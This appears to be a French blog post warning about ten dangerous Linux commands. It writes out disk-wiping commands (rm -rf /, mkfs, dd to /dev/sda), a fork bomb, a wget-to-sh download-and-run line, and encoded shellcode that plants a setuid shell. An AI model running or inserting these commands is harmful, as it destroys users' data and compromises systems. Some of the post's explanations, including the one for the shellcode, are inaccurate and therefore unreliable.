Les 10 commandes les plus dangereuses sous Linux

0
309

1. rm -rf /

Cette commande efface tout simplement tous les fichiers contenus sur votre disque dur.

2. la version hexadécimale de la commande rm -rf / :

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

3. mkfs.ext3 /dev/sda

Mkfs est une commande utilisée pour formater les disques durs. Ici elle effacera les données du disque /dev/sda.

4. :(){:|:&};:

Cette commande bash, pleine de caractères bizarres, est en fait une bombe fork. Si vous la lancez, votre système sera contraint de créer des processus jusqu’à saturation de la mémoire. Et ceci provoquera donc le plantage de votre ordinateur.

5. any_command > /dev/sda

Avec cette commande, vous risquez d’écrire n’importe quoi dans les blocks du disque dur. Et cela pourrait entraîner une perte totale des données.

6. wget http://some_untrusted_source -O- | sh

On ne doit jamais télécharger et exécuter aussitôt un script se trouvant sur Internet. Vérifiez le sérieux du site et étudiez rapidement le code avant de le lancer.

7. mv ~/* /dev/null

Déplacer un fichier ou un répertoire vers /dev/null revient à le mettre à la poubelle. Et ceci sans possibilité de restauration.

8. 0:> [file]

La version bash de la commande ci-dessus est toute aussi redoutable.

9. dd if=/dev/zero of=/dev/sda

Cette commande va écrire des zéros dans tous les blocks du disque dur. Cela revient à faire un formatage complet.

10. chmod -R 777 /

Cette commande va positionner les droits de lecture et d’écriture sur tous les fichiers. Et les commandes situées dans /bin ne pourront plus fonctionner car elles ne supportent pas ce mode.

Au passage, si vous êtes curieux, vous pouvez éventuellement tester ces commandes dans une virtualbox. En prenant soin de faire un backup de l’image.

LAISSER UN COMMENTAIRE

Please enter your comment!
Please enter your name here